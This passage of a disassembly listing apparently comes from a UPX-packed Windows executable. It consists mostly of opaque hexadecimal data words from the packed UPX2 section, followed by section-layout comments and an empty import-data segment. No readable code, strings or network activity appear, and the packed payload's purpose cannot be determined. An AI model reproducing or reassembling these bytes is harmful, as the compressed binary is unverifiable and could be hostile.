9EF55822h, 881AC6E3h, 0ACD7BC6Ah, 0DC255CD6h, 8EC4F28Bh dd 57121F3Eh, 0A8891D05h, 0B3307E27h, 4055F242h, 3CFD814Ah dd 3C9CEAB3h, 0B5C47EAEh, 0C061F5F2h, 0C80896CFh, 392F0A1Ah dd 298E6634h, 1F9CED9Dh, 3067697Ch, 0A343E0AAh, 1F1ADF26h dd 0E081D50Dh, 0E828B62Fh, 18442A3Ah, 5AB91E56h, 8B6E1F6Ah dd 7C3D4159h, 7CDC2AF3h, 7410BEEEh, 0AE23F238h, 1871BAB3h dd 968C8B5Ah, 34984773h, 0E81150A2h, 0D8D8C6FFh, 587C590Eh dd 0DFC8750Ah, 14BB9DCBh, 0DF804C37h, 0CA739583h, 3A501126h dd 0A4ED0E67h, 0D05390E6h, 43E383ECh, 79C47BD9h, 0C4448242h dd 0CFC0676h, 41274D11h, 50C04C36h, 957D53C9h, 5240A6FAh dd 0CC05E6AFh, 0DF88B44Eh, 137B5D8Bh, 7891A213h, 0ACCCAABAh dd 16FC5ADEh, 0FED7E2BAh, 68014AA3h, 9A56514Ah, 8A60C1D6h dd 149DBE37h, 606320B6h, 0F313334Ch, 0A994CB09h, 1437D232h dd 0C72C5746h, 99F715E1h, 0A0B01C2Eh, 6C4D2A99h, 5F21552Ah dd 3C356E7Fh, 30306E1Eh, 0B95A8742h, 0A8410AE3h, 7C94708Ah dd 0B3C3872Eh, 89E08F2Ah, 0C818A2B2h, 0FC24EADBh, 0D6B325B5h dd 9445AA04h, 60FE3DE0h, 0E4D49A25h, 0E2E09ECEh, 3CAF4413h dd 9DE123BDh, 5DF44C3Ch, 40DBC89Eh, 5F7C9841h, 0F47495Fh dd 6CE5BE4Fh, 0BEEEh, 0F3E3692h, 0BCCD4DF9h, 0A76C5A18h dd 0ECD847B6h, 6B4D2D4Ah, 0B21B6639h, 63055F02h, 0B0A553F1h dd 5344720Bh, 385162D3h, 0AC8C6A7Ah, 67B69BBEh, 5F8C8AE9h dd 10AB7DFFh, 6C378221h, 2E873A5h, 51658242h, 489844FEh dd 8827B39Bh, 0ED590A9Ah, 0D4E4828Ah, 1A94AB8Dh, 59179A3Ah dd 60705CC6h, 0DD002785h, 68E82686h, 0EEB8AABAh, 0B25BF629h dd 0A342B206h, 3AFC8BA5h, 0F35CBA5Ah, 8081E7EAh, 4A92A92h dd 0CD8346B6h, 40A98488h, 0D43E7CCDh, 0EB349E6Eh, 886624D3h dd 0C4F9536Ah, 0F3A04ECCh, 27F8BA39h, 809B990Eh, 0C438A971h dd 4FCF9B07h, 76EC67C9h, 0BB237676h, 0B915F6C8h, 0C0D03C72h dd 0CDEC40D1h, 0D84A6673h, 645F811Ah, 0D0D03DC1h, 0A69C1262h dd 53676972h, 4CFEA217h, 608C8CEh, 0EFFBDD06h, 0F86A1E83h dd 6406A13Ah, 0DB7CE45Dh, 717DB14Ch, 0F9D83EA9h, 0F8D33ACAh dd 0BFB4h, 0C698F711h, 0BD4BC626h, 8C7C0822h, 1F78F2D2h dd 94B4F027h, 1C9E5BC6h, 0DE84DFC1h, 2623DE1Eh, 50E78A62h dd 95EB19A9h, 0AC9C28C2h, 0BBB9B9Eh, 37DB7E85h, 38F8F7FDh dd 292576E1h, 4050BC96h, 0C569075Dh, 0CD8B0676h, 0CCBCC8E2h dd 0AFE88FD8h, 28719DC7h, 0D3181606h, 9F17986Ah, 6884E7Ah dd 0DD7B5D86h, 78EA9E2Bh, 849A5BAh, 73F02EDEh, 0E4560E87h dd 0BD3526h, 775CAA08h, 8CC7156Eh, 469409Dh, 0CFF346B6h dd 0C86FC5D2h, 13104EFEh, 5337D0E2h, 0E0DD5552h, 4E7CCA28h dd 7815A1DEh, 0DBC4F2F0h, 0B8D65443h, 0EC89B0FAh, 0B087EB11h dd 0A8BDF242h, 84787666h, 0A819F575h, 40C07EAEh, 0C1EB17ECh dd 0C808867Dh, 672D4C91h, 3800BA7Dh, 0AB8BE197h, 9A202BBFh dd 2BC91ABAh, 0A25C1BCDh, 0E10722E2h, 0E838E46Eh, 2EA8AFB3h dd 0F0FBAE4Eh, 3648B7B9h, 0F0CAB6B6h, 3E3CBFF1h, 6972BEFEh dd 8424422Fh, 0E07FB446h, 8C6C4A45h, 9B6C80F3h, 97B67963h dd 9DE3C684h, 9CEC180Eh, 0E4A3D27Bh, 2B759D22h, 4974C212h dd 234F7191h, 20F2761Bh, 15F12C2h, 38E8B49Eh, 43E8E9E2h dd 40E99FD1h, 0B1E48252h, 44CF2D78h, 8B9783E8h, 6C5201B6h dd 9D0B6D1Dh, 0A6AA9309h, 0E0B765D5h, 0E4C79F6Ah, 1B84A25Bh dd 8347D969h, 0C8862BF8h, 90F02EBEh, 7FD4814Ch, 0FDBF122Ah dd 0FC4CF88Eh, 0C240BBE7h, 0BD29C282h, 88C86F3Eh, 4E944FD9h dd 35764EEEh, 0D21F9C87h, 0B34C1445h, 5ABAD628h, 2167B675h dd 24C4E2E1h, 0A8E866D3h, 73F0AC73h, 4F67AD40h, 246A8CD7h dd 0A790B766h, 3D867F85h, 94907EAEh, 0BB8E2AB8h, 0F6D61309h dd 8CA90A0Ah, 0D5D88161h, 0BC741263h, 2767720Ah, 5CBC0B42h dd 9485CDCEh, 1684BB4h, 9D4BC345h, 15384348h, 458FAE1Fh dd 748470CEh, 0C68A2359h, 0F9553ADAh, 10FCBAh, 84245BFAh dd 5C2D9536h, 0C309213Bh, 62F5A009h, 0E4DD3AD1h, 6EB1A496h dd 0FB993683h, 0C877DE6Bh, 5BBB8A6Fh, 2868F5BEh, 0FEE9397Ah dd 5FC49DFBh, 0C68417B0h dd 5491808Fh, 0BC791D6Fh, 0A87F1679h, 0D68C7DADh, 1B880676h dd 0AFCDC8FFh, 0A07BD5h, 0BD82FB90h, 3D7F736Ah, 0FED4CD2Ah dd 889FE1A6h, 0E484A26Ah, 0EB43C5h, 89ABC4DBh, 19844190h dd 8644CB64h, 1451404Fh, 0FC39DD2Fh, 677FD639h, 50F43D6Dh dd 0B558C33Bh, 6886CACAh, 0C71124AEh, 2ADE47DDh, 0A4D15656h dd 3AE9254Eh, 8AA04EB0h, 6C796F72h, 0F8E87697h, 99F3BAAAh dd 0B020538Eh, 3054F32Ah, 0B9122266h, 680905DDh, 94C06EECh dd 0BBB306B8h, 0D84AD263h, 58E8891Ah, 921C3BC1h, 0C18B1272h dd 0D888A8E4h, 0E931D9F5h, 0E0F0DF86h, 291DDA4h, 6B28B628h dd 0E843D5C2h, 0F070AEE5h, 36CCB70Bh, 0F8D2B6B6h, 0DE49C59Ch dd 8500AED0h, 20A04DD2h, 2348C636h, 0E63C1A9Ah, 11FA9E7Dh dd 94B452CAh, 8D278006h, 9CEC64A8h, 2FDF268Dh, 0A44265B6h dd 74ED6F56h, 218C7A38h, 20F28E13h, 0DC41FFC2h, 69F8E6A4h dd 0EC1C1058h, 7E2E6BD1h, 3CE78242h, 9D0C0989h, 0A6AC8A9Fh dd 0C65F1BEh, 2BF482A0h, 48267C93h, 23C4192Ah, 65DE9A41h dd 610DA272h, 68B864E6h, 2FCF6389h, 1AA17E8Fh, 41EBE306h dd 7828747Ah, 0C21A2FB5h, 40053E7Eh, 13E469Dh, 41FB46B6h dd 4E984F53h, 0C1414EEEh, 142BBA73h, 67085649h, 0C4254FFh dd 0AF60DB8Eh, 24C1B136h, 0D06DEFD6h, 0EF0CFAB8h, 0B04285A6h dd 0C1F7942h, 81FCF391h, 3C9CFA9Ah, 0C6B55EAEh, 548C87D1h dd 1A3B86E6h, 0BDDBCB19h, 55D96FC9h, 546450E6h, 0D8B1193Eh dd 60F791AAh, 0F0881BCDh, 0B63722E2h, 19DF6715h, 0E9C5CBCDh dd 0F060EC22h, 3F233D41h, 0CD5B4FA0h, 73C46947h, 314FD59h dd 454F0BC2h, 8998C51Eh, 0E51B1560h, 0DE43710h, 95B82821h dd 535336B4h, 88BED1D6h, 0AD309C0Dh, 53BB2A76h, 13A9C58Fh dd 0BCCE1AFFh, 643B2D9Eh, 74E762E6h, 38407469h, 37DF7A0Ah dd 0CD4B15E1h, 0D425CAEFh, 9703FA76h, 0F00043A9h, 6CD67CDFh dd 0F8F6E598h, 424BC26h, 0F200765Eh, 605CC33Ah, 2D674A07h dd 2D95271Dh, 98CCEFE2h, 33A313D5h, 711BB250h, 87C7C915h dd 0AB61B9C1h, 8FC37027h, 0FB5BE416h, 0CB9F7B49h, 88E3848Fh dd 6FEFB1E5h, 2777851Fh, 88DC5974h, 21832595h, 0EFF40DDEh dd 0DBC166BDh, 73DB9929h, 0D3F2C712h, 58201BE1h, 0CBAB0EB8h dd 4786578Eh, 0D018F575h, 0F33F8150h, 44F2EA00h, 0ABE086F6h dd 0A4D3F5E5h, 0D0508E3Eh, 4799933Fh, 319886B2h, 5CBC1950h dd 6BD261AAh, 74465A47h, 0CAA1C216h, 2172AB5Ch, 13F5A104h dd 0FF943281h, 26BB8AF8h, 2CE7BBACh, 0D385B1ABh, 73244211h dd 2848D075h, 9634A5Ah, 1090CDB8h, 96E81154h, 1B6452C9h dd 0DF775AEAh, 8080E306h, 204BC292h, 2868E5F8h, 8CAC4A47h dd 9334E1BEh, 3FD472C1h, 38F83E6Dh, 0ED0A990Ah, 0BFAF76C6h dd 78E981ADh, 4B881634h, 8CCD0954h, 14B18DBEh, 2A6F7AE2h dd 0DA17E9F9h, 0DC3C9950h, 22A0BBCDh, 6F84A262h, 22232ED4h dd 9F0D81AAh, 9B301DDAh, 7DDCB107h, 0FDB1266Ch, 0FC4CF8CAh dd 388C746Dh, 4A5C292h, 6E76AEE7h, 99DC3525h, 9000777Ch dd 0A104F293h, 98486FC5h, 0D582FA00h, 48B426D6h, 0DB3B0416h dd 3CE7B453h, 1DEE3938h, 0A009EA8Bh, 0C3B11942h, 0A841F2E3h dd 3C9CFA8Ah, 37E20AAFh, 54DD8657h, 0C80885F6h, 0CD207F1Ah dd 0C0690A9Bh, 0AB8BED62h, 59927D7Dh, 4C859E27h, 0E0E09ECEh dd 64024AFAh, 8071A616h, 6C4C2A3Ch, 16264606h, 0F11ECD7Dh dd 0F8A88FDAh, 0F6BE4Ch, 8800AED7h, 941D3E97h, 0FFA82436h dd 9C55CEDFh, 1090C67Eh, 14BD27A2h, 8E1A87Bh, 59885BEAh dd 19A45BF9h, 0A4446222h, 331CEE56h, 95F0D7FAh, 44B5EE8Eh dd 0C969F272h, 3DF8E6DFh, 19CDD7Eh, 4050C750h, 33FAF657h dd 58B182F3h, 0CCAC8A9Ah, 0D0D97AAEh, 0C4CDEE5Fh, 0D16F1406h dd 9EF83FA9h, 88601E5Eh, 1B7B50D4h, 9755657Eh, 0EEBD4245h dd 0ED7B2EDEh, 0F404F07Eh, 3AB8AB25h, 0A7B4BA5Ah, 8F7FC192h dd 4A69316h, 0F07DCDB6h, 87ECDA98h, 4E1372A0h, 0EBC98ECAh dd 0A3DA59B9h, 9D7CDA68h, 0A0C07AC4h, 0DA4F02B2h, 0D2EB3084h dd 3C76E9EEh, 89B4EBE9h, 3454F252h, 0AC0D5666h, 7E544703h dd 754D7EBEh, 44F43B42h, 0D8600B7Dh, 0E8DF0A0Ah, 0DA343769h dd 0E1F91262h, 0D8888686h, 5C0DBF59h, 44139C2Dh, 5D80A705h dd 0E828A606h, 0E8430A3Ah, 0F070AEF0h, 9CBC417Dh, 7475B77h dd 3E64AF41h, 0D285BEFEh, 84BCC61Dh, 0BDC3C636h, 8C7C0822h dd 918084F5h, 94D476E8h, 52F336C6h, 0AFFE29E2h, 3452DDC7h dd 0B42CEF09h, 0A5E3E646h, 0AC9C7A12h, 0C3BB8ECh, 0DC71F1E6h dd 38F8E6F6h, 0BC74DD89h, 0CB40FE2Eh, 8E658A28h, 0CF7F057Eh dd 4029016Dh, 0A7D01EFCh, 0C4CD1667h, 58185606h, 2B3EEE2Ah dd 6C121D56h, 510D925Bh, 68B86452h, 0EDE4D931h, 0F475D9EEh dd 0B414A23Bh, 0C383626h, 0AD444D48h, 7F7C1586h, 84F9B6Dh dd 0A3E035B5h, 5ABDC6A8h, 0C94FEA0Dh, 2DA467AFh, 25D15656h dd 1C6C98A2h, 0FEFFFA7Dh, 0A956D3BDh, 0A8E95951h, 0AE99D0FAh dd 0C5307E27h, 4C869B44h, 0DE6A4230h, 0D475AA03h, 3F3FA489h dd 48AE8988h, 3F18CCF5h, 5C158E9Fh, 0D0508E3Eh, 51359F42h dd 551185F3h, 5CAC586Eh, 0F0881BCDh, 0C38722E2h, 0E828A67Eh dd 440F013Ah, 0F02329D7h, 0F1633282h, 0F8A889E6h, 7CDC3ACBh dd 43C7B99Ah, 2484E21Ah, 8CCD3196h, 8C6C5A63h, 6480CE7Eh dd 0CF5C00A5h, 42272931h, 0DE38D761h, 25C3DE1Eh, 4F6C29BBh dd 0E8E56D5Bh, 4F8C7A38h, 0BBB3059Ch, 31235A89h, 38E8CF62h dd 0BC1C7A09h, 0C5CBEA5Ah, 0C474C09Ah, 0A388B75h, 49AF8A8Ah dd 50C04C12h, 9E7F9AE3h, 249D9D16h, 0E53C8A68h, 63131604h dd 0E58CE8FBh, 0B2B36D4h, 6947AAE2h, 70E06C5Ah, 0F43D226Ah dd 707A3726h, 0AC1FBB13h, 0B902ABE4h, 8153C282h, 88D87F32h dd 2CECCADAh, 1D13488Ah, 1424C24Ah, 1DAF56F0h, 1C6CE3EEh dd 0A0A25E8Eh, 0E23AF6C7h, 916CE321h, 2C0CEAEAh, 0B6456E1Ah dd 0DD747C8h, 3D8F7676h, 3C8CC30Eh, 0C0C03EAEh, 436E09A7h dd 0CAA244F4h, 0A7DBE8CCh, 0E2570437h, 8276B8A0h, 0AAB6164h dd 389E91CEh, 63B89C41h, 74467E4Fh, 6C27A616h, 93B3D085h dd 0B2081BA1h, 0E16B3292h, 0F8A88814h, 3EA88F35h, 95FFBEFEh dd 84347C34h, 4A284BBBh, 19E14A4Ah, 10808C16h, 94DE00F3h dd 5A846339h, 9035AFAh, 2030E0A8h, 0E618D7CDh, 0BD97E646h dd 0AC9C545Ch, 71F85B13h, 12B72D2h, 38E8B4BEh, 1E89855Ch dd 0C340EE10h, 0D426DEF7h, 0A04B0676h, 0CCAC8A9Ah, 0D1D164E3h dd 0C4CC1D0Fh, 57E84E06h, 0C9BC1FEBh, 0A0E51E5Eh, 1B4C21B1h dd 0ED692966h, 0ECDCBF3Ah, 70E0131Dh, 0E861B228h, 5C44B740h dd 892DD646h, 44685E7Dh, 715B3D6Dh, 727DAEB3h, 0DE043525h dd 0F1EFB101h, 6C192D0Ch, 204A6210h, 1C7CDA4Fh, 5F05B6EEh dd 1DB11D4Dh, 98CC225Dh, 6D445F77h, 0E0BB6E0Eh, 0ED5944Ah dd 9D0B7460h, 3C9C92DCh, 44B7E51h, 14B602B8h, 0F6FA1309h dd 88AF0A0Ah, 8C6E0F36h, 21282D5Dh, 0DC5E1585h, 0A3467842h dd 1F9F7631h, 0A765DD0Dh, 0E828D2AEh, 0D4FDC13Ah, 0F070AE71h dd 74942F6Ah, 0F89874A6h, 7CDC0A72h, 1056EEh, 0A0E64212h dd 9CD7E36h, 8F844A5Ah, 0D290CE7Eh, 0C039528Eh, 3615DAE2h dd 0E0FCA269h, 20C8BE17h, 2F446232h, 7558C202h, 410D70F1h dd 30A0D7F8h, 4B34952Ah dd 3C3A9719h, 0BF1D7D0Ah, 0AA45F82Ch, 7BF08595h, 7C15FFCBh dd 8B010010h, 0FFh, 24Eh dup(0) dd 12FFE000h, 1316h dup(0) UPX2 ends ; Section 4. (virtual address 00032000) ; Virtual size : 00001000 ( 4096.) ; Section size in file : 00000200 ( 512.) ; Offset to raw data for section: 00032000 ; Flags C0000040: Data Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure data ; Segment permissions: Read/Write _idata2 segment para public 'DATA' use32 assume cs:_idata2 ;org 31452000h dd 80h dup(0) align 1000h _idata2 ends end start